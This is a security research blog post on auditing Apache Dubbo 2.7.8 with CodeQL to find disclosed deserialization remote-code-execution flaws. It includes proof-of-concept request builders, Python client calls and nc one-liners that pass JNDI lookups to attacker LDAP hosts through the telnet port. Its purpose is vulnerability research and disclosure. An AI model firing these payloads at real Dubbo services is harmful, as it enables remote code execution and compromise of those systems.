September 21, 2021

Apache Dubbo: All roads lead to RCE

Alvaro Munoz

During an audit of Apache Dubbo v2.7.8 source code, I found multiple vulnerabilities enabling attackers to compromise and run arbitrary system commands on both Dubbo consumers and providers. I’ve been planning a blog post for a while (and was encouraged by all the Twitter feedback), but it was delayed when I found four new RCEs that I reported to the Apache Dubbo project. I wanted to make sure they had ample time to remediate them.

CodeQL is GitHub’s semantic code analysis engine that lets you query code as though it were data, allowing you to find variants of a given vulnerability pattern. In this blog post, I’ll summarize the process I used to find these vulnerabilities and how I used CodeQL, not as an automated scanner to find occurrences of a specific vulnerability pattern, but rather as an audit oracle which helped me answer questions about the codebase as I was exploring it. This is not a blog post about performing variant analysis or writing a query to detect the issues I previously found through manual review, but rather about leveraging CodeQL as a codebase exploration tool to accelerate my audit. As you’ll see throughout this post, the issues I found could have been found by CodeQL automatically if third-party libraries such as Netty or Apache Curator had been modelled by CodeQL libraries, which was not the case at the time of the audit.

I assume that you have a basic level of familiarity with CodeQL. We won’t get into the details of most of the queries but they’re straightforward enough to be understood by anyone with a basic knowledge of CodeQL.

Dubbo 101: what is it and who uses it

Apache Dubbo is a high-performance, Java-based, open-source RPC framework with over 35K stars on GitHub. It’s one of the most popular Apache Foundation projects.

The main components of the Dubbo architecture are:

architecture

The providers can expose their services using a variety of protocols, but by default they use the Dubbo binary protocol, which uses a single long-lived connection and NIO asynchronous communication on top of the Netty framework (the transport layer can also be configured to use Grizzly or Mina instead).

dubbo protocol

As you can see in the diagram above, the binary Dubbo protocol uses five bits to specify the serialization format to be used and then includes the RPC method name, serialized arguments, and attachments as part of the request body. More about this later on.
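To make the header layout more concrete, here is a minimal Python sketch of how a 16-byte Dubbo header could be packed and parsed. The field order (magic, flags, status, request ID, body length) and the flag masks reflect my understanding of the Dubbo codec; the function names are hypothetical, and the value 2 for Hessian2 used in the usage note is an assumption for illustration.

```python
import struct

MAGIC = 0xDABB             # two-byte magic number that opens every Dubbo frame
FLAG_REQUEST = 0x80        # set for requests, clear for responses
FLAG_TWOWAY = 0x40         # set when the sender expects a reply
FLAG_EVENT = 0x20          # set for events such as heartbeats
SERIALIZATION_MASK = 0x1F  # the low five bits carry the serialization ID
HEADER_FORMAT = ">HBBQI"   # magic, flags, status, request ID, body length (16 bytes)


def pack_header(serialization_id, request_id, body_len,
                request=True, twoway=True, event=False, status=0):
    """Build a 16-byte header for a frame whose body is body_len bytes long."""
    if not 0 <= serialization_id <= SERIALIZATION_MASK:
        raise ValueError("serialization ID must fit in five bits")
    flags = serialization_id
    if request:
        flags |= FLAG_REQUEST
    if twoway:
        flags |= FLAG_TWOWAY
    if event:
        flags |= FLAG_EVENT
    return struct.pack(HEADER_FORMAT, MAGIC, flags, status, request_id, body_len)


def parse_header(data):
    """Split the first 16 bytes of a frame into named header fields."""
    size = struct.calcsize(HEADER_FORMAT)
    magic, flags, status, request_id, body_len = struct.unpack(HEADER_FORMAT, data[:size])
    if magic != MAGIC:
        raise ValueError("not a Dubbo frame")
    return {
        "serialization_id": flags & SERIALIZATION_MASK,
        "request": bool(flags & FLAG_REQUEST),
        "twoway": bool(flags & FLAG_TWOWAY),
        "event": bool(flags & FLAG_EVENT),
        "status": status,
        "request_id": request_id,
        "body_len": body_len,
    }
```

For instance, `parse_header(pack_header(2, 1, 100))` round-trips a two-way request that asks for serialization ID 2. The point to keep in mind is that every one of these fields, including the serialization ID, is chosen by whoever sends the bytes.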

Past vulnerabilities

Apache Dubbo has a fairly recent history of deserialization vulnerabilities:

New vulnerabilities

During the process of auditing Dubbo and using CodeQL as an audit oracle, I identified multiple and varied new deserialization vulnerabilities that could lead to pre-auth remote code execution (RCE):

GHSL            CVE               Title
GHSL-2021-035   CVE-2021-25641    Bypass Hessian2 allowlist via alternative protocols
GHSL-2021-036   No CVE assigned   Pre-auth RCE via multiple Hessian deserializations in the RPC invocation decoder
GHSL-2021-037   CVE-2021-30179    Pre-auth RCE via Java deserialization in the Generic filter
GHSL-2021-038   CVE-2021-30179    Pre-auth RCE via arbitrary bean manipulation in the Generic filter
GHSL-2021-039   CVE-2021-32824    Pre-auth RCE via arbitrary bean manipulation in the Telnet handler
GHSL-2021-040   CVE-2021-30180    RCE on customers via Tag route poisoning (unsafe YAML unmarshaling)
GHSL-2021-041   CVE-2021-30180    RCE on customers via Condition route poisoning (unsafe YAML unmarshaling)
GHSL-2021-042   CVE-2021-30181    RCE on customers via Script route poisoning (Nashorn script injection)
GHSL-2021-043   CVE-2021-30180    RCE on providers via Configuration poisoning (unsafe YAML unmarshaling)
GHSL-2021-094   CVE-2021-36162    RCE on customers via MeshApp route poisoning (unsafe YAML unmarshaling)
GHSL-2021-095   CVE-2021-36163    Pre-auth unsafe Hessian deserialization when Hessian protocol is used
GHSL-2021-096   No CVE assigned   Pre-auth unsafe Java deserialization when RMI protocol is used
GHSL-2021-097   CVE-2021-37579    Bypass checkSerialization security control

CVE-2021-25641 was independently discovered by Checkmarx researcher Dor Tumarkin who already shared a nice write up about this issue so I won’t be covering it in detail.

First things first: identifying the attack surface

When facing a new codebase, especially one as large as Dubbo (107.7 kLOC), it’s very convenient to focus your audit efforts on the most critical security features, including authentication and authorization and also every piece of code an attacker can interact with. This is commonly referred to as the attack surface of the application. I like to have a clear idea of the attack surface of the application, which I think of as all the doors to the application that I’m able to knock on with my inputs. When the application is relatively small, this can be accomplished by manually reviewing the source code. But Apache Dubbo is too large to effectively enumerate the available attack surface by hand, and reviewing the entirety of the source code would be a time-consuming task. So I’ll use CodeQL instead.

CodeQL defines a data flow source type called RemoteFlowSource, which represents the data that an attacker would be able to tamper with. Assuming that any user-controlled input is potentially attacker-controlled, I can ask my CodeQL oracle for all the classes that contain either an expression or parameter which can introduce such user-controlled data:

import java
import semmle.code.java.dataflow.FlowSources

from RemoteFlowSource source
where
  not source.getLocation().getFile().getRelativePath().matches("%/src/test/%")
select
  source,
  source.getEnclosingCallable().getDeclaringType(),
  source.getSourceType()

From the architecture diagram, it seems like the most interesting attack surface will be the provider transport layer (Netty by default). But I would also expect additional attack surfaces for the other supported protocols (Hessian, RMI, HTTP, REST, gRPC, Redis, etc.).

The query only returns ten results though:

attack surface

Looking at the results, it seems that CodeQL identified input sources in:

However, I can’t find any remote flow sources representing the Dubbo protocol entry points. If I were to run an automatic scan on the Dubbo codebase, the results would be incomplete since I’m lacking models for the Dubbo protocol network layer. If you read through the Dubbo Protocol documentation, you can see that Dubbo can use multiple NIO frameworks to handle the communication between providers and consumers including Netty, Grizzly, and Mina:

transport layer

These frameworks will basically decode the request’s body, create an RPC invocation object, and dispatch it to the right service handler. I need to model how these transporters introduce the network data into the application. Since the default transporter is Netty, I’ll model it and leave the others as an exercise for readers.

Netty Model

Netty is a NIO client server framework that enables quick and easy development of network applications. In a nutshell, Netty defines pipelines where the user can register inbound and outbound handlers. I’m interested in the inbound ones and, in particular, I need to consider the second argument to io.netty.channel.ChannelInboundHandler.channelRead(ChannelHandlerContext ctx, Object msg) as a remote flow source. In addition, reading through the documentation, I can see that there is a special type of inbound handler that decodes the bytes received from the socket, so I need to model the second argument to io.netty.handler.codec.ByteToMessageDecoder.decode(ChannelHandlerContext ctx, ByteBuf in, List<Object> out) as a remote flow source too.

Modeling them with CodeQL is straightforward. I just need to extend the RemoteFlowSource and indicate what expression, or in this case parameter, I want to treat as a source of untrusted data. For example, for the ChannelInboundHandler read methods:

import java
import semmle.code.java.dataflow.FlowSources

/** The ChannelInboundHandler class */
class ChannelInboundHandler extends Class {
  ChannelInboundHandler() {
    this.getASourceSupertype*().hasQualifiedName("io.netty.channel", "ChannelInboundHandler")
  }
}

/** The ChannelInboundHandler.channelRead method */
class ChannelReadMethod extends Method {
  ChannelReadMethod() {
    this.getName() = ["channelRead", "channelRead0", "messageReceived"] and
    this.getDeclaringType() instanceof ChannelInboundHandler
  }
}

/** The ChannelInboundHandler.channelRead(1) source */
class ChannelReadSource extends RemoteFlowSource {
  ChannelReadSource() {
    exists(ChannelReadMethod m |
      this.asParameter() = m.getParameter(1)
    )
  }
  override string getSourceType() { result = "Netty Handler Source" }
}

Re-running the attack surface query with the new sources returns more complete and promising results:

Netty sources

These results provide a starting point to look for vulnerabilities. And, as it turns out, both CVE-2020-11995 and CVE-2020-1948 are deserialization vulnerabilities in Dubbo’s decoding of the incoming packet into an RPC Invocation object.

Pre-auth RCE via multiple Hessian deserializations in the RPC invocation decoder (GHSL-2021-036)

The previous query gave us a few methods to analyze and track where the user-controlled data can go. Observing how data flowed from the Netty adapters, I found multiple Hessian deserialization operations. Some of them were described in CVE-2020-11995 and CVE-2020-1948, but others were different variants. I decided to run a variant analysis using CodeQL and, as I’ll explain below, it returned many new variants that I reported to the Dubbo maintainers as GHSL-2021-036. The way Apache Dubbo addressed CVE-2020-11995 and CVE-2020-1948 was by enabling an opt-in Hessian type filter which, if enabled, could also protect against these new variants. Even though there was an existing opt-in mitigation, we decided to report these new paths so the Dubbo team was aware of them. These new paths proved useful later on in this research. If you use Dubbo, make sure to enable this filter and apply an allow list to only allow the deserialization of known and expected good types.
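The allow-list idea is not specific to Hessian. As a rough analogy in Python (this is not Dubbo code, and it says nothing about how the Hessian filter is configured), the sketch below restricts `pickle` deserialization to an explicit set of types by overriding `Unpickler.find_class`. The `ALLOWED` set and the `safe_loads` helper are illustrative names of my own.

```python
import io
import pickle
from collections import OrderedDict

# Only these (module, name) pairs may be resolved while unpickling.
ALLOWED = {("collections", "OrderedDict")}


class AllowListUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any type outside the allow list."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(
                f"type {module}.{name} is not on the allow list")
        return super().find_class(module, name)


def safe_loads(data):
    """Deserialize bytes, rejecting references to unexpected types."""
    return AllowListUnpickler(io.BytesIO(data)).load()


# An expected type round-trips normally.
expected = safe_loads(pickle.dumps(OrderedDict(a=1)))

# A reference to any other type is rejected before it is resolved.
try:
    safe_loads(pickle.dumps(io.BytesIO))
    rejected = False
except pickle.UnpicklingError:
    rejected = True
```

The design choice that matters is the direction of the check: an allow list names the handful of types the service actually expects, whereas a block list has to anticipate every gadget an attacker might find.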

These findings are a great example of how important it is to understand the attack surface and entry points to an application. By reading the high level description of the Dubbo protocol or by looking into the past vulnerabilities found, you may get the wrong idea that an attacker can only control RPC invocation objects or maybe a generic request. But the reality is that an attacker can make packets be interpreted in different ways and by different parts of the application. For example, if the received bytes do not start with the 0xdabb magic number, the request will be handled by TelnetCodec.decode() (super.decode()), which opens up a new attack surface for the attacker:

decode method

Similarly, requests starting with the Dubbo magic number are handled by ExchangeCodec.decodeBody():

decodeBody method

Since an attacker is in complete control of the request bytes, there is nothing stopping them from sending not just requests but also responses, heartbeats, events, and so on, thus widely increasing their attack surface in terms of code that is parsing their controlled content.
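The routing decisions described above can be sketched as a small classifier. This is a simplified Python model, not the Dubbo implementation: the function name and return labels are hypothetical, the flag masks follow my understanding of the header layout, and the value 20 for an OK response status is an assumption.

```python
MAGIC = b"\xda\xbb"   # Dubbo magic number at the start of a frame
HEADER_LEN = 16       # fixed header size in bytes
FLAG_REQUEST = 0x80   # set for requests, clear for responses
FLAG_EVENT = 0x20     # set for events, including heartbeats
STATUS_OK = 20        # assumed status byte of a successful response


def classify(frame: bytes) -> str:
    """Name the decoding path that a raw frame would be routed to."""
    if frame[:2] != MAGIC:
        return "telnet"            # no magic number: treated as a Telnet command
    if len(frame) < HEADER_LEN:
        return "incomplete"        # the decoder waits for more bytes
    flags, status = frame[2], frame[3]
    if flags & FLAG_REQUEST:
        return "event request" if flags & FLAG_EVENT else "request"
    if status != STATUS_OK:
        return "error response"    # the error message is read from the body
    return "event response" if flags & FLAG_EVENT else "ok response"
```

Every label returned here corresponds to a different piece of parsing code, and the sender alone decides which one runs, whether or not the receiving side was expecting a response or an event at that point.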

The vulnerabilities found so far (CVE-2020-11995 and CVE-2020-1948) were located in the DecodeableRpcInvocation.decode() method:

  1. Request -> DecodeableRpcInvocation.decode()

However, reading the code, it seems there may be places other than the decoding of an RPC invocation where unsafe deserialization could happen. I’ll be using ObjectInput abstraction as my sink since at this point I don’t care about which serializer is being used. With that, I can ask the CodeQL oracle for unsafe deserialization dataflows using the following parameters:

/**
 * @kind path-problem
 */

import java
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PathGraph

class InsecureConfig extends TaintTracking::Configuration {
  InsecureConfig() { this = "InsecureConfig" }

  override predicate isSource(DataFlow::Node source) {
    exists(Method m |
      m.getName() = "decodeBody" and
      m.getDeclaringType().hasQualifiedName("org.apache.dubbo.rpc.protocol.dubbo", "DubboCodec") and
      m.getParameter(1) = source.asParameter()
    )
  }

  override predicate isSink(DataFlow::Node sink) {
    exists(Call call |
      call.getCallee().getName().matches("read%") and
      call.getCallee()
        .getDeclaringType()
        .getASourceSupertype*()
        .hasQualifiedName("org.apache.dubbo.common.serialize", "ObjectInput") and
      call.getQualifier() = sink.asExpr()
    )
  }

  override predicate isAdditionalTaintStep(DataFlow::Node n1, DataFlow::Node n2) {
    exists(MethodAccess ma |
      ma.getMethod().getName() = "deserialize" and
      ma.getMethod().getDeclaringType().hasQualifiedName("org.apache.dubbo.common.serialize", "Serialization") and
      ma.getArgument(1) = n1.asExpr() and
      ma = n2.asExpr()
    )
  }
}

from InsecureConfig conf, DataFlow::PathNode source, DataFlow::PathNode sink
where conf.hasFlowPath(source, sink)
select sink, source, sink, "unsafe deserialization"

This query returns eight results that are true positive variants of the reported ones:

variants

These results are alternative ways to trigger unsafe deserialization operations and should be accounted for. Otherwise, they may become ways to circumvent future mitigations implemented to protect against unsafe deserialization attacks. They can be summed up as:

  1. HeartBeat Request -> decodeHeartbeatData -> decodeEventData -> in.readEvent -> in.readObject

  2. Event Request -> decodeEventData -> in.readEvent -> in.readObject

  3. OK Response -> DecodeableRpcResult.decode() -> handleValue -> readObject

  4. OK Response -> DecodeableRpcResult.decode() -> handleException -> readThrowable -> readObject

  5. OK Response -> DecodeableRpcResult.decode() -> handleAttachment -> readAttachments -> readObject

  6. OK HeartBeat Response -> decodeHeartbeatData -> decodeEventData -> in.readEvent -> in.readObject

  7. OK Event Response -> decodeEventData -> in.readEvent -> in.readObject

  8. NOK Response -> in.readUTF (in Hessian, readUTF can lead to readObject)

Pre-auth RCE via Java native deserialization in the Generic filter (GHSL-2021-037)

As an additional check, I also want to ask the oracle for all the places where the ObjectInput abstraction is used to deserialize data, regardless of whether it is coming from decodeBody(), as you saw in the previous example, or somewhere else. For that purpose, I’ll use the following query:

import java

class ObjectInputClass extends RefType {
  ObjectInputClass() {
    this.getASourceSupertype*().hasQualifiedName("org.apache.dubbo.common.serialize", "ObjectInput")
  }
}

class ReadObjectCall extends Call {
  ReadObjectCall() {
    exists(Method m |
      this.getCallee() = m and
        m.getName().matches("read%") and
        m.getDeclaringType() instanceof ObjectInputClass
    )
  }
}

from ReadObjectCall call
where
  not call.getEnclosingCallable().getDeclaringType() instanceof ObjectInputClass and
  not call.getLocation().getFile().getRelativePath().matches("%/src/test/%")
select
  call,
  call.getEnclosingCallable(),
  call.getEnclosingCallable().getDeclaringType()

The above query looks for calls to read* methods on objects implementing the ObjectInput interface, excluding calls located in test files or in the ObjectInput implementations themselves. It returns 14 results.

Most of these calls are performed on an ObjectInput object that is returned by the Serialization.deserialize() method. However, the instance of Serialization is normally returned by the CodecSupport.getSerialization() method:

getSerialization method
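As a rough Python model of the check this method performs in 2.7.8 (a sketch based on my reading of the code, not the actual Java), the serializer is looked up by the ID taken from the request, and only the JDK-based serializers are compared against the one the provider is configured to use. The numeric IDs, the `AVAILABLE` registry, and the exception name are assumptions for illustration.

```python
class UnexpectedSerialization(Exception):
    """Raised when the peer asks for a serializer the provider will not use."""


# Assumed IDs of the JDK-based serializers (java, compactedjava, nativejava).
JDK_BASED_IDS = {3, 4, 7}

# Hypothetical registry of the serializers present on the classpath.
AVAILABLE = {2: "hessian2", 3: "java", 4: "compactedjava", 7: "nativejava"}


def get_serialization(requested_id, configured_name="hessian2", available=AVAILABLE):
    """Return the serializer name selected by the ID found in the request header."""
    name = available.get(requested_id)
    if name is None:
        raise UnexpectedSerialization(f"no serializer registered for ID {requested_id}")
    # Only the JDK-based serializers must match the provider's configuration.
    if requested_id in JDK_BASED_IDS and name != configured_name:
        raise UnexpectedSerialization(f"serializer {name} was not configured")
    return name
```

In this model, `get_serialization(7)` is rejected on a provider configured for Hessian2, but any other serializer that happens to be registered, for example a hypothetical `{8: "kryo"}` entry pulled in by a transitive dependency, is accepted without comparison.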

This is a very important piece of code. The Dubbo protocol allows callers to specify the serialization protocol, which from an attacker perspective is very convenient. An attacker can specify the Java native serialization type and make the opt-in Hessian type filter useless! However, before blindly switching to whatever serialization type is specified by the user, Dubbo will check against the one expected by the server and will throw an exception if the client tries to use the native Java deserializers. As we saw in CVE-2021-25641, an attacker is still able to force the use of other unsafe deserializers, but in the latest Dubbo versions these serializers are not available in the classpath by default. This is still an insecure pattern since those dependencies (for example, Kryo) could be included in the classpath transitively by a third-party dependency, in which case the Dubbo provider would be vulnerable. Considering that a) Hessian has an opt-in type filter, b) Java native deserialization cannot be arbitrarily specified by a client and c) other unsafe deserialization types are not available in the classpath, we can consider that a deserialization operation using the Serialization instance returned by CodecSupport.getSerialization() will be “secure” or at least there will be ways to make it secure. Using that knowledge, I can refine my query to discard results flowing through CodecSupport.getSerialization():

brand new variants

This time, the query returns results in only two classes: GenericFilter and RedisProtocol

The RedisProtocol doesn’t seem to be supported and trying to use it to export a service will throw an exception:

RedisProtocol

However, reviewing this class made me aware of the RMIProtocol and HessianProtocol which in turn led to the GHSL-2021-095 and GHSL-2021-096 findings.

GenericFilter is a default-installed filter extension, similar to Servlet filters but operating on the RPC invocations before they are finally dispatched to the right provider service. This particular filter handles generic invocations, which are mainly used when the client does not have an API interface or model class. These invocations use the generic $invoke and $invokeAsync method names and will use the Java Reflection API to call the user-specified service. In addition, the caller also needs to set an RPC attachment specifying how the arguments should be decoded. The possible values are:

An attacker is in control of this RPC attachment and setting it to nativejava will force the native Java deserialization of the byte array located in the third argument:

GenericFilter native java deserialization

For example, the following code will prepare an RPC request which will trigger the Java deserialization sink:

// 1.dubboVersion
out.writeString("2.7.8");
// 2.path
out.writeString("org.apache.dubbo.samples.basic.api.DemoService");
// 3.version
out.writeString("");
// 4.methodName
out.writeString("$invoke");
// 5.methodDesc
out.writeString("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;");
// 6.paramsObject
out.writeString("sayHello");
out.writeObject(new String[] {"java.lang.String"});
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(<DESERIALIZATION PAYLOAD BYTE[]>);
out.writeObject(new Object[] {baos.toByteArray()});
// 7.map
HashMap map = new HashMap();
map.put("generic", "nativejava");
out.writeObject(map);

Note that to successfully exploit this issue, an attacker needs to know a service and method name to reach the GenericFilter code (for example, org.apache.dubbo.samples.basic.api.DemoService and sayHello in the above proof of concept), which could be a problem. Remember how when analyzing the attack surface, I found out that I could reach a TelnetCodec? Well, it turns out this is well documented and that it allows an attacker to trivially figure out a valid service/method name pair by connecting to the Dubbo protocol port and issuing an unauthenticated ls command. This info can then be used to craft the final deserialization attack:

$ telnet localhost 20880
Trying ::1...
Connected to localhost.
Escape character is '^]'.

dubbo> ls

PROVIDER:
org.apache.dubbo.samples.basic.api.DemoService

dubbo> cd org.apache.dubbo.samples.basic.api.DemoService

Used the org.apache.dubbo.samples.basic.api.DemoService as default.
You can cancel default service by command: cd /

dubbo> ls

Use default service org.apache.dubbo.samples.basic.api.DemoService.
org.apache.dubbo.samples.basic.api.DemoService (as provider):
    sayHello

Pre-auth RCE via arbitrary bean manipulation in the Generic filter (GHSL-2021-038)

If you were following along carefully, you will have noticed that there were other allowed types for encoding the generic service invocation arguments:

protobuf-json uses Google protobufs, which are normally considered secure since they do not allow attackers to instantiate arbitrary types. However, the true, raw.return, and bean values could be of interest to an attacker and could allow them to run arbitrary methods.

For the case where generic attachment is either true or raw.return, the PojoUtils.realize() method will be invoked:

PojoUtils realize call

This method accepts an argument where the attacker can provide a HashMap containing a special "class" key to specify the class to be instantiated:

"class" attribute

The rest of the map entries will be used to populate the instantiated type either by invoking a setter, if available, or by using reflection:

newInstance call

Therefore, given the existence of an RCE setter gadget in the provider’s classpath, an attacker will be able to execute arbitrary code.
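To illustrate why a map-driven "class" key is dangerous, here is a toy Python model of the pattern. It is not the PojoUtils code: the `REGISTRY`, the class names, and the `set_` naming convention are all hypothetical, and the `Lookup` class only records its argument where a real gadget would perform a side effect such as a JNDI lookup.

```python
class Greeting:
    """The type the service actually expects as its argument."""

    def __init__(self):
        self.name = None

    def set_name(self, value):
        self.name = value


class Lookup:
    """Stand-in for a setter gadget: its setter has a side effect."""

    performed = []

    def set_as_text(self, value):
        # A real gadget would do something dangerous here; this one only records.
        Lookup.performed.append(value)


# Hypothetical stand-in for "every class on the classpath".
REGISTRY = {"demo.Greeting": Greeting, "demo.Lookup": Lookup}


def realize(value, expected_type):
    """Turn a map into an object, honouring an optional "class" entry."""
    if not isinstance(value, dict):
        return value
    # The caller-supplied "class" entry overrides the type the service expects.
    cls = REGISTRY[value["class"]] if "class" in value else expected_type
    obj = cls()
    for key, item in value.items():
        if key == "class":
            continue
        setter = getattr(obj, "set_" + key, None)
        if callable(setter):
            setter(item)              # use the setter when one exists
        else:
            setattr(obj, key, item)   # otherwise set the field directly
    return obj
```

Calling `realize({"class": "demo.Lookup", "as_text": "ldap://attacker.example/foo"}, Greeting)` returns a `Lookup` instance and runs its setter, even though the service only ever expected a `Greeting`.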

For example, using the following Python client, you can instantiate an org.apache.xbean.propertyeditor.JndiConverter bean (if the gadget is available in the classpath) and call its setAsText method, which will in turn result in the invocation of a JNDI lookup call that can be used to run arbitrary Java code:

  client.send_request_and_return_response(
      service_name="org.apache.dubbo.samples.basic.api.DemoService",
      method_name='$invoke',
      param_types="Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;",
      service_version="",
      args=["sayHello", ["java.lang.String"], [{"class": "org.apache.xbean.propertyeditor.JndiConverter", "asText": "ldap://<attacker_server>/foo"}]],
      attachment={"generic":"raw.return"})

In a similar way, you can set the generic attachment to bean to reach the following code:

bean deserialization

In this case, JavaBeanSerializeUtil.deserialize() will also allow us to invoke default constructors of arbitrary classes and then call setters or set field values for the constructed objects.

deserialize method

getSetter call

For example, using the Python client, you can send the following request, which will result in an arbitrary JNDI lookup call leading to RCE:

  beanDescriptor=new_object(
        'org.apache.dubbo.common.beanutil.JavaBeanDescriptor',
        className="org.apache.xbean.propertyeditor.JndiConverter",
        type=7,
        properties={"asText": "ldap://<attacker_server>/foo"}
        )
  return client.send_request_and_return_response(
      service_name="org.apache.dubbo.samples.basic.api.DemoService",
      method_name='$invoke',
      param_types="Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;",
      service_version="",
      args=["sayHello", ["java.lang.String"], [beanDescriptor]],
      attachment={"generic":"bean"})

These custom deserializers also support serialization of Maps. For those cases, a new HashMap is created and the user-controlled items are put into it. This allows an attacker to also utilize gadgets that are triggered not by a setter call but by a hashCode() call (invoked to decide where each key is stored and whether it equals an existing one), which extends the gadget surface and enables gadget chains contained entirely in the Dubbo default classpath.
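The same effect is easy to observe in Python, where inserting a key into a `dict` calls the key's `__hash__` method. The sketch below is only an analogy for the Java HashMap behaviour; the `Noisy` class and `rebuild_map` helper are hypothetical names.

```python
class Noisy:
    """A key type whose hash method has an observable side effect."""

    calls = 0

    def __init__(self, key):
        self.key = key

    def __hash__(self):
        Noisy.calls += 1          # a gadget would do its work at this point
        return hash(self.key)

    def __eq__(self, other):
        return isinstance(other, Noisy) and self.key == other.key


def rebuild_map(entries):
    """Copy caller-supplied (key, value) pairs into a fresh dict."""
    result = {}
    for key, value in entries:
        result[key] = value       # hashing the key happens implicitly here
    return result
```

Nothing in `rebuild_map` calls a method on the keys explicitly, yet code belonging to the key type runs as soon as the map is rebuilt. That is the property a hashCode()-based gadget chain relies on.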

Pre-auth RCE via arbitrary bean manipulation in the Telnet handler (GHSL-2021-039)

Both PojoUtils and JavaBeanSerializeUtil are custom Dubbo deserializers, so the immediate question is, are they used somewhere else? CodeQL can help answer this question:

realize calls

You’ve already seen their use in GenericFilter. CompatibleFilter and GenericImplFilter deal with provider responses, which should not be under attacker control. MockInvoker is used for tests, but there is a remaining result that looks interesting: InvokeTelnetHandler.

Turns out that you can also use the Telnet protocol to perform RPC invocations, and the documentation clearly states that:

When there is parameter overload, or the type conversion fails, you can specify the class to be converted by adding the class attribute

Therefore, an attacker with access to the Telnet port (the same one as the Dubbo protocol port) can query the available services and invoke any of them. In this process, an attacker will be able to instantiate arbitrary classes and invoke arbitrary setters and hashCode() on them.

This finding is quite interesting since when searching for information about the telnet port I found a write up for CVE-2020-1948 that explains a vulnerability in the DecodeableRpcInvocation class but then talks about the Dubbo Telnet protocol and how it uses FastJSON to parse the method invocation JSON data. Since FastJSON allows the use of type discriminators (@type), a similar vulnerability affected older versions of Dubbo. For example:

echo 'invoke org.apache.dubbo.samples.basic.api.DemoService.sayHello({ "111": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "222": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://192.168.85.1:8089/test_by_cqq", "autoCommit": true } })' | nc -i 1 dubbo_server 20880

The vulnerability (with no CVE that I know of) was addressed by enabling the FastJSON block list. However, when a map is passed as an argument, the deserialized map is later processed by PojoUtils.realize(), which enables the same attack. For example:

echo "invoke org.apache.dubbo.samples.basic.api.DemoService.sayHello({'class':'org.apache.xbean.propertyeditor.JndiConverter','asText': 'ldap://attacker/foo'})" | nc -i 1 dubbo_server 20880

RCEs via unsafe YAML unmarshalling (GHSL-2021-040, GHSL-2021-041 and GHSL-2021-043)

Another good practice when reviewing code is to look for hazardous APIs used throughout the application, regardless of having solid evidence that they can be exercised with untrusted data. This analysis will show us “hot” classes in the application that should be reviewed carefully. For this purpose I like to use the CodeQL sink collection. You can think of it as using just the isSink predicates of the CodeQL TaintTracking configurations. This is something that should be done for most of the vulnerability categories. The result should be a map of what classes do file IO operations, which ones write data to HTTP responses, which ones perform deserialization operations, and so on. You can use such a map to guide and focus your audit on what are likely to be high-yield areas of the code base. To keep this blog short(er), I’ll show you how I enumerated an auditing heat map just for the unsafe deserialization category.

import java
import semmle.code.java.security.UnsafeDeserializationQuery

from UnsafeDeserializationSink node
where
  not node.getLocation().getFile().getRelativePath().matches("%/src/test/%")
select
  node.asExpr().getParent().(Call).getCallee().getDeclaringType(), // deserializing class
  node.asExpr().getParent(), // deserializing method
  node.asExpr().getParent().(Call).getEnclosingCallable().getDeclaringType() // enclosing class

In the above query, I’m importing the UnsafeDeserializationQuery library, which defines an UnsafeDeserializationSink DataFlow node. I query all the nodes that are instances of UnsafeDeserializationSink and are not located in test files. The query returns 23 results. Ignoring those in classes implementing the ObjectInput interface (since I already showed you how to analyze them), I get three results, all of them potentially insecure YAML deserialization operations:

YAML.load calls

I can manually review where the data passed to these methods comes from, or I can use a simple DataFlow query to let CodeQL do the review for us:

import java
import semmle.code.java.dataflow.DataFlow
import semmle.code.java.dataflow.FlowSources
import DataFlow
import PartialPathGraph

class PartialTaintConfig extends DataFlow::Configuration {
  PartialTaintConfig() { this = "PartialTaintConfig" }
  
  override int explorationLimit() { result = 5 }
  
  override predicate isSource(DataFlow::Node source) {
    none()
  }

  override predicate isSink(DataFlow::Node sink) {
    exists(MethodAccess ma |
        ma.getMethod().hasName("load") and
        ma.getMethod().getDeclaringType().hasName("Yaml") and
        sink.asExpr() = ma.getAnArgument()
    )
  }
}

from PartialPathNode n, int dist
where
  any(PartialTaintConfig c).hasPartialFlowRev(n, _, dist) and
  n.getNode() instanceof DataFlow::ExplicitParameterNode and
  dist > 0
select dist, n

The query looks for reverse partial data flows. That is, starting from the sink and within the exploration limits set in the query (5), it looks backwards toward a potential source for all the expressions or parameters leading to the sink. This kind of query is very useful when looking for APIs that are not propagating the taint and need to be modeled but also when you need to “hoist” a sink. You can think of hoisting or lifting a sink as a way to find all other methods that, if invoked with tainted data, will propagate that taint to the sink and therefore can also be considered sinks themselves.
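The idea of hoisting a sink with a bounded backward search can be sketched outside CodeQL as a breadth-first walk over reversed edges. The graph below is a toy with illustrative node names (only Yaml.load and ConditionRuleParser.parse appear in this post; the others are hypothetical), and the function is a simplification of what partial flow exploration does, not a reimplementation of it.

```python
from collections import deque

# Toy reversed flow graph: each node maps to the nodes that pass data into it.
REVERSE_EDGES = {
    "Yaml.load": ["ConditionRuleParser.parse", "TagRuleParser.parse"],
    "ConditionRuleParser.parse": ["Router.process"],
    "TagRuleParser.parse": ["Router.process"],
    "Router.process": ["Listener.dataChanged"],
}


def hoist(sink, limit):
    """Return every node that reaches sink within limit steps, with its distance."""
    distances = {}
    seen = {sink}
    queue = deque([(sink, 0)])
    while queue:
        node, dist = queue.popleft()
        if dist == limit:
            continue                       # exploration limit reached on this path
        for caller in REVERSE_EDGES.get(node, []):
            if caller not in seen:
                seen.add(caller)
                distances[caller] = dist + 1
                queue.append((caller, dist + 1))
    return distances
```

With a limit of 2, the walk stops at `Router.process`; raising the limit to 5 also surfaces `Listener.dataChanged`. Each returned node is a candidate "hoisted" sink: a method that becomes dangerous if it is ever called with tainted data.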

My intention with this query was to look for places where the data deserialized by Yaml.load() can come from. The results show 11 possible paths:

YAML.load hoisted

You can see that there are several results labeled as event[content], which means that the flow would originate from the content field of the event parameter. For example:

process method

You can see how the content of the ConfigChangedEvent flows into the ConditionRuleParser.parse() method which is then passed to the final Yaml.load() sink. The process() method overrides the ConfigurationListener.process() method:

configuration listener
